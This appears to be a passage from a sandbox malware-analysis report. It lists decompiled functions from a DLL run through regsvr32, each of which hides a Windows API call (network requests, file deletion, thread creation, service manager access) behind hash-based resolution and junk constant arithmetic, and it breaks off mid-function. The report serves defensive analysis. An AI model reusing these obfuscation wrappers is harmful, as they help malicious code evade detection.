Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction ID: 031dc55c3b1f58344b2c48e420bdd783e0c70cefa818c64ca28912174f1a3e10
Opcode Fuzzy Hash: 8bacd117322b64fd42504966482242d0bc11aa74408019ed1aecf2da1c0dea5e
Instruction Fuzzy Hash: A5112E75D00218EBDB18CFE5CC4A8EEBBB5EB44304F10819DE429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 10009EA8 Relevance: 1.5, APIs: 1, Instructions: 44
fileCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10009EA8(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t35;
				int _t42;
				WCHAR* _t46;

				_push(_a8);
				_t46 = __ecx;
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t35);
				_v20 = 0xb0cce;
				_v20 = _v20 + 0xffff00ee;
				_v20 = _v20 ^ 0x0007bd05;
				_v12 = 0x1e8fca;
				_v12 = _v12 >> 6;
				_v12 = _v12 << 8;
				_v12 = _v12 + 0xffff1da9;
				_v12 = _v12 ^ 0x0077171f;
				_v16 = 0xc679b7;
				_v16 = _v16 + 0x38bf;
				_v16 = _v16 ^ 0x00cf762a;
				_v8 = 0xa3ba51;
				_v8 = _v8 ^ 0xa0d3ead1;
				_v8 = _v8 + 0xe688;
				_v8 = _v8 + 0xffff6d73;
				_v8 = _v8 ^ 0xa079263d;
				E1001BFF0(0xac802c42, 0x385, __ecx, __ecx, 0x77e9f533);
				_t42 = DeleteFileW(_t46); // executed
				return _t42;
			}

APIs

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00E39F9E,00000000), ref: 10009F51

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction ID: 418f1ef9d6d25acf68a43748a91802fcf8eb4dd854a304eccc5db4d114e40d6a
Opcode Fuzzy Hash: 05b63ea037540c08496bef69ee0cecfed80cfa419fc6bd7bfec422803f2d9975
Instruction Fuzzy Hash: AB1148B2C01619EBDF48DFA4D80A8DEBBB4EF10318F108288E825A6250E7B05B548F91

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA9C Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000BA9C(int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t34;

				_v20 = 0x6b4597;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00116e69;
				_v16 = 0x7d3df7;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x03ee9fa4;
				_v12 = 0x7e0c35;
				_v12 = _v12 ^ 0xa2581e84;
				_v12 = _v12 ^ 0xa22bc007;
				_v8 = 0xada9ee;
				_push(_t34);
				_v8 = _v8 * 0x61;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x6b103fde;
				E1001BFF0(0xac802c42, 0x166, _t34, _t34, 0x80a33dd2);
				ExitProcess(_a12);
			}

0x1000baa2
0x1000baa9
0x1000baad
0x1000bab4
0x1000babb
0x1000babf
0x1000bac6
0x1000bacd
0x1000bad4
0x1000badb
0x1000bae6
0x1000baee
0x1000baf6
0x1000bafa
0x1000bb12
0x1000bb1d

APIs

ExitProcess.KERNEL32(00116E69), ref: 1000BB1D

Memory Dump Source

Source File: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.435988975.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.436027359.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction ID: 8b053e7fd0c7c19cbffb8e592a3d1a6bbcb506d1d2403606fd79baaff6e70ad2
Opcode Fuzzy Hash: 5a29f8c2dfa274dc4c38ec6c4fc52361ad96745e54715afb883c837706f91096
Instruction Fuzzy Hash: 91010475D1120CEB8B04DFA4CA4A9DEBBB4FB04348F10859DE821B7211D7B55B44CF81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 772, Parent PID: 2628COMMON

Execution Graph

Execution Coverage:	30.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0.7%
Total number of Nodes:	1061
Total number of Limit Nodes:	31

Executed Functions

Function 10007209 Relevance: 1.6, APIs: 1, Instructions: 59
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10007209(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t42;
				int _t53;
				signed int _t55;
				void* _t60;
				long _t61;

				_push(_a20);
				_t61 = __edx;
				_t60 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t42);
				_v20 = 0x2a08d1;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x00057ba8;
				_v16 = 0x3b50f8;
				_v16 = _v16 | 0x8759cf22;
				_v16 = _v16 ^ 0xe02f4d8c;
				_v16 = _v16 ^ 0x67570c15;
				_v12 = 0xc688ed;
				_t55 = 0x12;
				_v12 = _v12 * 0x69;
				_v12 = _v12 * 0x71;
				_v12 = _v12 ^ 0xf1a724bd;
				_v8 = 0x4bcf1;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 / _t55;
				_v8 = _v8 ^ 0x000e745d;
				E1001BFF0(0x3c1c9a36, 0xa8, _t55, _t55, 0xfdceae50);
				_t53 = InternetReadFile(_a12, _t60, _t61, _a20); // executed
				return _t53;
			}

0x10007211
0x10007214
0x10007216
0x10007218
0x1000721b
0x1000721e
0x10007221
0x10007224
0x10007225
0x10007226
0x1000722b
0x10007234
0x10007238
0x1000723f
0x10007246
0x1000724d
0x10007254
0x1000725b
0x10007268
0x1000726c
0x1000727f
0x10007282
0x10007289
0x10007290
0x1000729e
0x100072a1
0x100072b4
0x100072c4
0x100072cb

APIs

InternetReadFile.WININET(00057BA8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100072C4

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 7128703f165c273399c9388700999c1b7a5e34bd505302aed7b695938c021fc3
Instruction ID: 1ad18d7c42b86a5913a48b5ed1eb5e1cd312c49ed6ff56f5ef109c6aa34b23b4
Opcode Fuzzy Hash: 7128703f165c273399c9388700999c1b7a5e34bd505302aed7b695938c021fc3
Instruction Fuzzy Hash: 53210275D00208BBCF14DFA5C8869DEBFB5EF45310F108099E825A7251D7B59A64AB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000B34C Relevance: 1.6, APIs: 1, Instructions: 50
processCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B34C(int _a4, int _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t56;
				signed int _t57;
				signed int _t58;

				_v12 = 0xc7741e;
				_t57 = 0x62;
				_v12 = _v12 * 0x71;
				_v12 = _v12 * 0x25;
				_v12 = _v12 | 0x1378dd26;
				_v12 = _v12 ^ 0xbb7c801d;
				_v16 = 0xca640;
				_t58 = 0x34;
				_v16 = _v16 / _t57;
				_v16 = _v16 + 0xeb86;
				_v16 = _v16 ^ 0x000d3cb7;
				_v20 = 0xac682;
				_v20 = _v20 ^ 0x08b6e1b6;
				_v20 = _v20 ^ 0x08b41ccc;
				_v8 = 0x84d8a8;
				_v8 = _v8 << 9;
				_v8 = _v8 << 0xa;
				_push(_t58);
				_v8 = _v8 / _t58;
				_v8 = _v8 ^ 0x03c7f2cf;
				E1001BFF0(0xac802c42, 0x2a5, _t58, _t58, 0xb65e4a9b);
				_t56 = CreateToolhelp32Snapshot(_a4, _a8); // executed
				return _t56;
			}

0x1000b352
0x1000b361
0x1000b364
0x1000b36b
0x1000b36e
0x1000b375
0x1000b37c
0x1000b388
0x1000b389
0x1000b38e
0x1000b395
0x1000b39c
0x1000b3a3
0x1000b3aa
0x1000b3b1
0x1000b3b8
0x1000b3bc
0x1000b3c5
0x1000b3c6
0x1000b3c9
0x1000b3ed
0x1000b3fb
0x1000b400

APIs

CreateToolhelp32Snapshot.KERNEL32(BB7C801D,000D3CB7), ref: 1000B3FB

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 6eaeec263c87854248a26a861d6ddab3712d3b6360eb5a6a824061e67532e4b3
Instruction ID: 45694252f1fee7ef49279b154ba79713b17fd2138adf7977545c27f632006c24
Opcode Fuzzy Hash: 6eaeec263c87854248a26a861d6ddab3712d3b6360eb5a6a824061e67532e4b3
Instruction Fuzzy Hash: C511E275E0020CEBDF08DFA4D94A89EBBB5EB44308F20C599E425AB250D7B46B449F54

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE4B Relevance: 1.5, APIs: 1, Instructions: 48
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000FE4B(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				void* _t51;
				signed int _t53;

				_push(_a8);
				_push(_a4);
				E10009E7D(_t41);
				_v16 = 0x19ef4e;
				_t53 = 0x1e;
				_v16 = _v16 / _t53;
				_v16 = _v16 + 0xffff466d;
				_v16 = _v16 ^ 0x00043d4d;
				_v12 = 0x2e36b4;
				_v12 = _v12 | 0xdef2ed41;
				_v12 = _v12 ^ 0xacbe8c09;
				_v12 = _v12 ^ 0x724e4da9;
				_v20 = 0x1cc17b;
				_v20 = _v20 * 0x2d;
				_v20 = _v20 ^ 0x0509a851;
				_v8 = 0xc3e229;
				_v8 = _v8 << 8;
				_v8 = _v8 << 7;
				_v8 = _v8 | 0xf1b027e1;
				_v8 = _v8 ^ 0xf1b2ee24;
				E1001BFF0(0xac802c42, 0xbc, _t53, _t53, 0x8abf5bc7);
				_t51 = FindFirstFileW(_a8, _a4); // executed
				return _t51;
			}

0x1000fe51
0x1000fe54
0x1000fe59
0x1000fe5e
0x1000fe6c
0x1000fe72
0x1000fe75
0x1000fe7c
0x1000fe83
0x1000fe8a
0x1000fe91
0x1000fe98
0x1000fe9f
0x1000feb6
0x1000febe
0x1000fec5
0x1000fecc
0x1000fed0
0x1000fed4
0x1000fedb
0x1000feee
0x1000fefc
0x1000ff01

APIs

FindFirstFileW.KERNEL32(00043D4D,724E4DA9,?,?,?,?,?,?,?,100162AB), ref: 1000FEFC

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 1e44c752efb7c4c0b5fdf9d3cff73a4c9f29c4d56e65009fd71a831b55842546
Instruction ID: d09c603daa0019bd5ac4691b8fed7a8d7f23bc956bd2789becceccdf1f2ae024
Opcode Fuzzy Hash: 1e44c752efb7c4c0b5fdf9d3cff73a4c9f29c4d56e65009fd71a831b55842546
Instruction Fuzzy Hash: 8A1128B5D00208FBDF48CFA5DD4A8DEBBB0FB44704F10819CE829AA261D3B16B549F51

Uniqueness

Uniqueness Score: -1.00%

Function 10006BFA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E10006BFA(void* __ecx, DWORD* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, CHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t58;
				signed int _t60;
				signed int _t61;
				DWORD* _t68;

				_push(_a16);
				_t68 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10009E7D(_t46);
				_v16 = 0xe52dfb;
				_v16 = _v16 | 0x8be897dd;
				_v16 = _v16 ^ 0x37f49408;
				_v16 = _v16 ^ 0xbc15dcaa;
				_v20 = 0x474e51;
				_t60 = 0x26;
				_v20 = _v20 / _t60;
				_v20 = _v20 ^ 0x00006987;
				_v12 = 0xe861ed;
				_v12 = _v12 + 0xbd6c;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x8fadbe25;
				_v8 = 0x918e67;
				_t61 = 0x27;
				_v8 = _v8 / _t61;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x000a3434;
				E1001BFF0(0xac802c42, 0x3a, _t61, _t61, 0xf97a81e6);
				_t58 = GetComputerNameA(_a16, _t68); // executed
				return _t58;
			}

0x10006c01
0x10006c04
0x10006c06
0x10006c09
0x10006c0c
0x10006c0f
0x10006c11
0x10006c16
0x10006c1f
0x10006c26
0x10006c2d
0x10006c34
0x10006c40
0x10006c45
0x10006c4a
0x10006c51
0x10006c58
0x10006c5f
0x10006c63
0x10006c6a
0x10006c74
0x10006c7a
0x10006c83
0x10006c87
0x10006ca8
0x10006cb4
0x10006cba

APIs

GetComputerNameA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 10006CB4

Strings

a, xrefs: 10006C51
QNG, xrefs: 10006C34
44, xrefs: 10006C71

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: 44$QNG$a
API String ID: 3545744682-4246502536
Opcode ID: 5c70ec10dd6ac0ad666a4bea5aa5dfb789798586d4d249c45ad213a4eb9e203e
Instruction ID: 934acd5e49fdce3c782d286ee9e29ef48c4ea49018bb16c85180dceafb277584
Opcode Fuzzy Hash: 5c70ec10dd6ac0ad666a4bea5aa5dfb789798586d4d249c45ad213a4eb9e203e
Instruction Fuzzy Hash: B92124B5D00208EBDF14DFA4C90A8DEBBB5EB44314F108589E828AB251D7B29B20DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1001AEAE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
networkCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E1001AEAE(void* __ecx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a16, long _a20, intOrPtr _a24, WCHAR* _a28, intOrPtr _a32, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t48;
				void* _t58;
				signed int _t60;
				void* _t65;

				_push(_a48);
				_t65 = __ecx;
				_push(_a44);
				_push(0);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E10009E7D(_t48);
				_v32 = 0xc77de3;
				_v28 = 0x4c367f;
				_v24 = 0;
				_v12 = 0x948d72;
				_v12 = _v12 << 0xc;
				_v12 = _v12 + 0xffffef16;
				_v12 = _v12 ^ 0x48de345d;
				_v8 = 0xe6582c;
				_t60 = 0x7f;
				_v8 = _v8 / _t60;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x0074f06f;
				_v20 = 0x23a5f7;
				_v20 = _v20 * 0x31;
				_v20 = _v20 ^ 0x06df347e;
				_v16 = 0xb57d05;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x5f412189;
				E1001BFF0(0x3c1c9a36, 0x2a0, _t60, _t60, 0xbeb57219);
				_t58 = HttpOpenRequestW(_t65, _a28, _a4, 0, 0, 0, _a20, 0); // executed
				return _t58;
			}

0x1001aeb6
0x1001aebb
0x1001aebd
0x1001aec0
0x1001aec1
0x1001aec2
0x1001aec5
0x1001aec8
0x1001aecb
0x1001aece
0x1001aed1
0x1001aed2
0x1001aed5
0x1001aed8
0x1001aed9
0x1001aeda
0x1001aedf
0x1001aee8
0x1001aeef
0x1001aef2
0x1001aef9
0x1001aefd
0x1001af04
0x1001af0b
0x1001af17
0x1001af1d
0x1001af20
0x1001af24
0x1001af2b
0x1001af42
0x1001af4a
0x1001af51
0x1001af58
0x1001af5c
0x1001af6f
0x1001af85
0x1001af8c

APIs

HttpOpenRequestW.WININET(000BE600,?,48DE345D,00000000,00000000,00000000,004C367F,00000000), ref: 1001AF85

Strings

,X, xrefs: 1001AF0B

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: ,X
API String ID: 1984915467-3097098382
Opcode ID: 170234c0e25171df51bd02fa3f0782c944ecbd4edd323056a98225d1554172a6
Instruction ID: 8951318e072cb3c8b4683366b6d52b183e59e5c7c03e27f9bfad358bb0d041bf
Opcode Fuzzy Hash: 170234c0e25171df51bd02fa3f0782c944ecbd4edd323056a98225d1554172a6
Instruction Fuzzy Hash: D921F072900249BBCF11DF96DC09CEFBFB9EF89744F108199F91466260C3B59A61DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001AA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
threadCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E1001AA59(void* __ecx, void* __edx, long _a4, intOrPtr _a8, _Unknown_base(*)()* _a12, long _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				void* _t55;
				void* _t60;

				_t60 = __edx;
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10009E7D(_t45);
				_v36 = 0x1bb828;
				_v32 = 0xa71ec1;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x93d121;
				_v20 = _v20 ^ 0x09bf1adc;
				_v20 = _v20 ^ 0x092a03cf;
				_v16 = 0xd32abd;
				_v16 = _v16 | 0x8e49ce84;
				_v16 = _v16 ^ 0x8edb557f;
				_v12 = 0x625bf;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 + 0xffff7c3a;
				_v12 = _v12 ^ 0x01df22ae;
				_v8 = 0x264845;
				_v8 = _v8 * 0x7d;
				_v8 = _v8 * 0x51;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0008620b;
				E1001BFF0(0xac802c42, 0x2f0, __ecx, __ecx, 0xf260725);
				_t55 = CreateThread(0, _a16, _a12, _t60, _a4, 0); // executed
				return _t55;
			}

0x1001aa63
0x1001aa65
0x1001aa66
0x1001aa67
0x1001aa6a
0x1001aa6d
0x1001aa70
0x1001aa73
0x1001aa76
0x1001aa79
0x1001aa7c
0x1001aa7d
0x1001aa7e
0x1001aa83
0x1001aa8d
0x1001aa94
0x1001aa97
0x1001aa9a
0x1001aaa1
0x1001aaa8
0x1001aaaf
0x1001aab6
0x1001aabd
0x1001aac4
0x1001aadb
0x1001aae3
0x1001aaea
0x1001aaf1
0x1001aafc
0x1001ab03
0x1001ab06
0x1001ab0a
0x1001ab1d
0x1001ab31
0x1001ab38

APIs

CreateThread.KERNEL32(00000000,BF7751E1,092A03CF,00000000,01DF22AE,00000000), ref: 1001AB31

Strings

EH&, xrefs: 1001AAF1

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: EH&
API String ID: 2422867632-1673385673
Opcode ID: fd67aa51d67777c2473ff1ec65fdb6a92c486ea265a5d693a89665e38cc69e9d
Instruction ID: 0e76b08a9652c3fc2525e52d5d2d74dfdb13c15ba6071f4de65fb1d590a56184
Opcode Fuzzy Hash: fd67aa51d67777c2473ff1ec65fdb6a92c486ea265a5d693a89665e38cc69e9d
Instruction Fuzzy Hash: 6621D376C01209FBCF15DFE5CD4A8AEBFB5FF88304F108089E915A6220D3B59A649F91

Uniqueness

Uniqueness Score: -1.00%

Function 100032B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100032B5(void* __ecx, void* __edx, int _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				void* _t49;
				void* _t62;
				signed int _t64;
				signed int _t65;

				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				E10009E7D(_t49);
				_v32 = 0xf329ca;
				_v28 = 0;
				_v24 = 0;
				_v16 = 0x2373b;
				_t64 = 0x7a;
				_v16 = _v16 * 0x75;
				_t65 = 0x3d;
				_v16 = _v16 / _t64;
				_v16 = _v16 ^ 0x00061266;
				_v12 = 0xb7be71;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 + 0xafdb;
				_v12 = _v12 ^ 0x7920a4e8;
				_v12 = _v12 ^ 0x79205c77;
				_v8 = 0x1abc5;
				_v8 = _v8 / _t65;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x07f89b39;
				_v8 = _v8 ^ 0x07caeaee;
				_v20 = 0x49b926;
				_v20 = _v20 * 0x47;
				_v20 = _v20 ^ 0x147483b3;
				E1001BFF0(0x11de522c, 0x30d, _t65, _t65, 0xea9607);
				_t62 = OpenSCManagerW(0, 0, _a4); // executed
				return _t62;
			}

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,79205C77,?,?,?,?,?,?,?,?,00000000), ref: 10003384

Strings

w\ y, xrefs: 1000331D

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: w\ y
API String ID: 1889721586-240614871
Opcode ID: d43574fe54aa5dc51e6f6737349b2cd794a9859ce821d67804e8d084910fcc86
Instruction ID: 2673d0b832e4d885b295aa3d0736083a12d9b67bb68571235ce8c26550880700
Opcode Fuzzy Hash: d43574fe54aa5dc51e6f6737349b2cd794a9859ce821d67804e8d084910fcc86
Instruction Fuzzy Hash: 5C2123B5D01228FBDB04DFA9D84A9EEBFB5FF40344F208189E424AA250D3B56B40DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1001DA13 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E1001DA13(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t47;
				intOrPtr* _t55;
				void* _t56;
				signed int _t58;
				void* _t63;

				_t63 = __ecx;
				E10009E7D(_t47);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0x7cae4c;
				_v12 = 0x7702c1;
				_v12 = _v12 ^ 0xf81fe0bf;
				_v12 = _v12 + 0xffffcf5d;
				_t58 = 0x72;
				_v12 = _v12 / _t58;
				_v12 = _v12 ^ 0x022a2a9a;
				_v16 = 0x4f2156;
				_v16 = _v16 >> 7;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0002e295;
				_v20 = 0xb78be7;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x000fc4bf;
				_v8 = 0xa9d6f8;
				_v8 = _v8 | 0xf593f011;
				_v8 = _v8 << 1;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0xbbfaae1f;
				_t55 = E1001BFF0(0xac802c42, 0x9d, _t58, _t58, 0xd9363caf);
				_t56 =  *_t55(_a8, _t63, __ecx, __edx, _a4, _a8); // executed
				return _t56;
			}

0x1001da1d
0x1001da24
0x1001da29
0x1001da2f
0x1001da33
0x1001da3a
0x1001da41
0x1001da48
0x1001da54
0x1001da5a
0x1001da5d
0x1001da64
0x1001da6b
0x1001da6f
0x1001da73
0x1001da7a
0x1001da81
0x1001da85
0x1001da8c
0x1001da93
0x1001da9a
0x1001da9d
0x1001daa1
0x1001dac5
0x1001dad1
0x1001dad7

APIs

ProcessIdToSessionId.KERNEL32(0002E295,00000000,?,?,?,?,?,?,10003149), ref: 1001DAD1

Strings

V!O, xrefs: 1001DA64

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: ProcessSession
String ID: V!O
API String ID: 3779259828-4253860594
Opcode ID: e8b5029af471172a3526df464219aed3fc95986a455e3e50406c8f08aa2894f5
Instruction ID: ce0cc2d7eb9802c06df2b77b08ca0a4c9a2b875fd784d6fb77d3b228ffeb0838
Opcode Fuzzy Hash: e8b5029af471172a3526df464219aed3fc95986a455e3e50406c8f08aa2894f5
Instruction Fuzzy Hash: DE213376D0121CFFDB08DFE4C90AAEEBBB4FB00318F108199E9256A251D3B91B449F90

Uniqueness

Uniqueness Score: -1.00%

Function 1000FA6C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000FA6C(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t41;
				int _t52;
				signed int _t54;
				signed int _t55;
				struct _WIN32_FIND_DATAW* _t62;

				_push(_a12);
				_t62 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E10009E7D(_t41);
				_v20 = 0x604234;
				_v20 = _v20 | 0xd5373714;
				_v20 = _v20 ^ 0xd57f8140;
				_v12 = 0x4b3df3;
				_t54 = 0x51;
				_v12 = _v12 / _t54;
